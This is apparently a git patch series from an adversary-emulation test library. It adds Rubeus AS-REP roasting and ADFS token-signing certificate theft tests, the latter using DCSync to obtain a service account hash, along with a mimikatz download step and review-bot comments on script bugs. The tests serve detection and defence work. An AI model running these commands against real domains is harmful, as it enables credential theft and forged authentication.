Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AS-REP Roasting](../../T1558.004/T1558.004.md) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE 
A TEST](https://atomicredteam.io/contributing) | | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 03b104ef..0eaa8989 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -240,7 +240,64 @@ credential-access: - Dan Nutting, @KerberToast x_mitre_platforms: - Windows - atomic_tests: [] + identifier: T1558.004 + atomic_tests: + - name: Rubeus asreproast + auto_generated_guid: 615bd568-2859-41b5-9aed-61f6a88e48dd + description: | + Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast + This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus + supported_platforms: + - windows + input_arguments: + local_folder: + description: Local path of Rubeus executable + type: Path + default: "$Env:temp" + local_executable: + description: name of the rubeus executable + type: String + default: rubeus.exe + out_file: + description: file where command results are stored + type: String + default: rubeus_output.txt + rubeus_url: + description: URL of Rubeus executable + type: url + default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe + dependency_executor_name: powershell + dependencies: + - description: 'Computer must be domain joined + +' + prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) + {exit 0} else {exit 1} + +' + get_prereq_command: 'Write-Host Joining this computer to a domain must be + done manually + +' + - description: 'Rubeus must exist + +' + prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit + 0} else {exit 1} + +' + get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} + +' + executor: + command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}" + +' + cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore + +' + name: powershell + elevation_required: false T1552.003: technique: external_references: 
diff --git a/atomics/T1558.004/T1558.004.md b/atomics/T1558.004/T1558.004.md
new file mode 100644
index 00000000..c0657cc6
--- /dev/null
+++ b/atomics/T1558.004/T1558.004.md
@@ -0,0 +1,79 @@
+# T1558.004 - AS-REP Roasting
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1558/004)
+
Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) + +Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014) + +For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) + +An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. 
(Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) + +Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)
+ +## Atomic Tests + +- [Atomic Test #1 - Rubeus asreproast](#atomic-test-1---rubeus-asreproast) + + +
+ +## Atomic Test #1 - Rubeus asreproast +Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast +This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 615bd568-2859-41b5-9aed-61f6a88e48dd + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| local_folder | Local path of Rubeus executable | Path | $Env:temp| +| local_executable | name of the rubeus executable | String | rubeus.exe| +| out_file | file where command results are stored | String | rubeus_output.txt| +| rubeus_url | URL of Rubeus executable | url | https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}" +``` + +#### Cleanup Commands: +```powershell +Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Computer must be domain joined +##### Check Prereq Commands: +```powershell +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Write-Host Joining this computer to a domain must be done manually +``` +##### Description: Rubeus must exist +##### Check Prereq Commands: +```powershell +if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} +``` + + + + +
From 5ea85dab6d84f470c57b415f114eace27506b46b Mon Sep 17 00:00:00 2001 From: Arioch <16936254+ZeArioch@users.noreply.github.com> Date: Wed, 18 Aug 2021 23:27:26 +0200 Subject: [PATCH 25/39] T1055-2: update mimikatz download url (#1602) * update mimikatz download url * fix minor typo Co-authored-by: Carrie Roberts --- atomics/T1055/T1055.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index d2fefd94..e6ecea77 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -63,7 +63,8 @@ atomic_tests: get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force From 7110df309816720580ea4b109ed89bc098f9950f Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 18 Aug 2021 21:27:57 +0000 Subject: [PATCH 26/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 6 ++++-- atomics/T1055/T1055.md | 3 ++- 2 files changed, 6 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 0eaa8989..280d6c9c 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
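Review bot: The new `$mimikatz_relative_uri = ...` line swaps a pinned release URL for a scrape of the `releases/latest` HTML page, and nothing checks that a matching link was actually found; if the page layout changes or the asset list is not in the initial HTML, `$mimikatz_relative_uri` is empty, the next line downloads `https://github.com` itself into mimikatz.zip, and the test only fails later at `Expand-Archive` with a misleading error. In Windows PowerShell, `Invoke-WebRequest` without `-UseBasicParsing` also parses `Links` through the Internet Explorer engine (which can fail on hosts where IE first-run has not completed), and `Select-Object -ExpandProperty href` may yield several values if the asset is linked more than once. I would change the line to `$mimikatz_relative_uri = Invoke-WebRequest -UseBasicParsing "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -First 1 -ExpandProperty href` and follow it with `if (-not $mimikatz_relative_uri) { throw "mimikatz_trunk.zip link not found on the releases page" }`. Because the artifact is now whatever upstream published last, with no version or hash recorded, the test is no longer reproducible across runs, which is worth a sentence in the test's description. The same lines appear in the generated copies in atomics/Indexes/index.yaml and atomics/T1055/T1055.md in the following commit.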
@@ -15746,7 +15746,8 @@ privilege-escalation: get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force @@ -31921,7 +31922,8 @@ defense-evasion: get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 7f6c7a39..89bdde81 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md 
@@ -111,7 +111,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" +$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href +Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force From 0fd43a3d6314e7f3a78f0695950f97a25a8f24bd Mon Sep 17 00:00:00 2001 From: piaconsigny Date: Thu, 19 Aug 2021 11:20:48 +0200 Subject: [PATCH 27/39] add adfs certificates theft --- atomics/T1552.004/T1552.004.yaml | 96 ++++++++++++++++++++++++++++++++ 1 file changed, 96 insertions(+) diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml index 431e5b0c..a1129a9b 100644 --- a/atomics/T1552.004/T1552.004.yaml +++ b/atomics/T1552.004/T1552.004.yaml 
@@ -103,3 +103,99 @@ atomic_tests: cleanup_command: | rm -rf #{output_folder} name: sh +- name: ADFS token signing and encryption certificates theft - Local + auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f + description: | + Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server. + Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump. + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: | + AADInternals module must be installed. + prereq_command: | + if (Get-Module AADInternals) {exit 0} else {exit 1} + get_prereq_command: | + Install-Module -Name AADInternals -Force + executor: + command: | + Import-Module AADInternals -Force + Export-AADIntADFSCertificates + Get-ChildItem | Where-Object {$_ -like "ADFS*"} + Write-Host "`nCertificates retrieved successfully" + cleanup_command: | + Remove-Item -Path ".\ADFS_encryption.pfx" + Remove-Item -Path ".\ADFS_signing.pfx" + name: powershell +- name: ADFS token signing and encryption certificates theft - Remote + auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442 + description: | + Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer. + Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump. + supported_platforms: + - windows + input_arguments: + adfs_service_account_name: + description: Name of the ADFS service account + type: String + default: "adfs_svc" + replication_user: + description: Username with replication rights. 
It can be the Domain Admin running the script + type: String + default: "Administrator" + replication_password: + description: Password of replication_username + type: String + default: "ReallyStrongPassword" + adfs_server_name: + description: Name of an ADFS server + type: String + default: "sts.contoso.com" + dependency_executor_name: powershell + dependencies: + - description: | + AADInternals and ActiveDirectory modules must be installed. + prereq_command: | + if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1} + get_prereq_command: | + Install-Module -Name AADInternals -Force + executor: + command: | + Import-Module ActiveDirectory -Force + Import-Module AADInternals -Force | Out-Null + #Get Configuration + $dcServerName = (Get-ADDomainController).HostName + $svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}" + $PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord + # use DCSync to fetch the ADFS service account's NT hash + $hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex + $ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name} + # Get certificates decryption key + $Configuration = [xml]$ADFSConfig + $group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group + $container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName + $parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn + $base = "LDAP://CN=$group,$container,$parent" + $ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base)) + $ADSearch.Filter = '(name=CryptoPolicy)' + 
$ADSearch.PropertiesToLoad.Clear() + $ADSearch.PropertiesToLoad.Add("displayName") | Out-Null + $aduser = $ADSearch.FindOne() + $keyObjectGuid = $ADUser.Properties["displayName"] + $ADSearch.PropertiesToLoad.Clear() + $ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null + $ADSearch.Filter="(l=$keyObjectGuid)" + $aduser=$ADSearch.FindOne() + $key=[byte[]]$aduser.Properties["thumbnailphoto"][0] + # Get encrypted certificates from configuration and decrypt them + Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key + Get-ChildItem | Where-Object {$_ -like "ADFS*"} + Write-Host "`nCertificates retrieved successfully" + cleanup_command: | + Remove-Item -Path ".\ADFS_encryption.pfx" + Remove-Item -Path ".\ADFS_signing.pfx" + name: powershell + + From 697d400d0eb6225b5c6ac1731ce49559afa76542 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 19 Aug 2021 08:15:15 -0600 Subject: [PATCH 28/39] bump layer version (#1608) --- bin/generate-atomic-docs.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb index d6be5034..3c91df76 100755 --- a/bin/generate-atomic-docs.rb +++ b/bin/generate-atomic-docs.rb @@ -190,7 +190,7 @@ class AtomicRedTeamDocs def get_layer(techniques, layer_name) layer = { - "version" => "4.1", + "version" => "4.2", "name" => layer_name, "description" => layer_name + " MITRE ATT&CK Navigator Layer", "domain" => "mitre-enterprise", From 9b8c28e748f5dc537a8b2df1e61d9397b5c0810f Mon Sep 17 00:00:00 2001 
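Review bot: The remote test's `prereq_command:` uses `echo 0`/`echo 1` instead of `exit 0`/`exit 1`, so the prerequisite check always reports success, and its `-or` contradicts the description that both AADInternals and ActiveDirectory must be installed; in addition, `Get-Module AADInternals` without `-ListAvailable` (also used in the local test's check) only sees modules already imported into the session, so a fresh session reports the module missing even when it is installed. I would change the remote check to `if ((Get-Module -ListAvailable AADInternals) -and (Get-Module -ListAvailable ActiveDirectory)) {exit 0} else {exit 1}` and the local one to `if (Get-Module -ListAvailable AADInternals) {exit 0} else {exit 1}`. The matching `get_prereq_command` only installs AADInternals, so the ActiveDirectory (RSAT) requirement should at least be stated with a `Write-Host` message rather than left silent. Separately, `-ArgumentList #{replication_user}, $PWord` leaves the user name unquoted, so a value containing spaces breaks argument parsing; quote it as `"#{replication_user}"`, and note that the `replication_password` description refers to `replication_username`, which is not the argument's name.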
From: CircleCI Atomic Red Team doc generator Date: Thu, 19 Aug 2021 14:15:53 +0000 Subject: [PATCH 29/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../Attack-Navigator-Layers/art-navigator-layer-azure-ad.json | 2 +- .../Attack-Navigator-Layers/art-navigator-layer-containers.json | 2 +- .../art-navigator-layer-google-workspace.json | 2 +- .../Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json | 2 +- .../Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json | 2 +- .../Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json | 2 +- .../Attack-Navigator-Layers/art-navigator-layer-iaas.json | 2 +- .../Attack-Navigator-Layers/art-navigator-layer-linux.json | 2 +- .../Attack-Navigator-Layers/art-navigator-layer-macos.json | 2 +- .../Attack-Navigator-Layers/art-navigator-layer-office-365.json | 2 +- .../Attack-Navigator-Layers/art-navigator-layer-windows.json | 2 +- .../Indexes/Attack-Navigator-Layers/art-navigator-layer.json | 2 +- 12 files changed, 12 insertions(+), 12 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json index 26b3b6a1..5173cb9e 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json index 5dc65d44..23e5ef7e 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json index 6a5ee1b8..3f0c17f4 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json index 9959b6ba..74d69334 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json @@ -1 +1 @@ 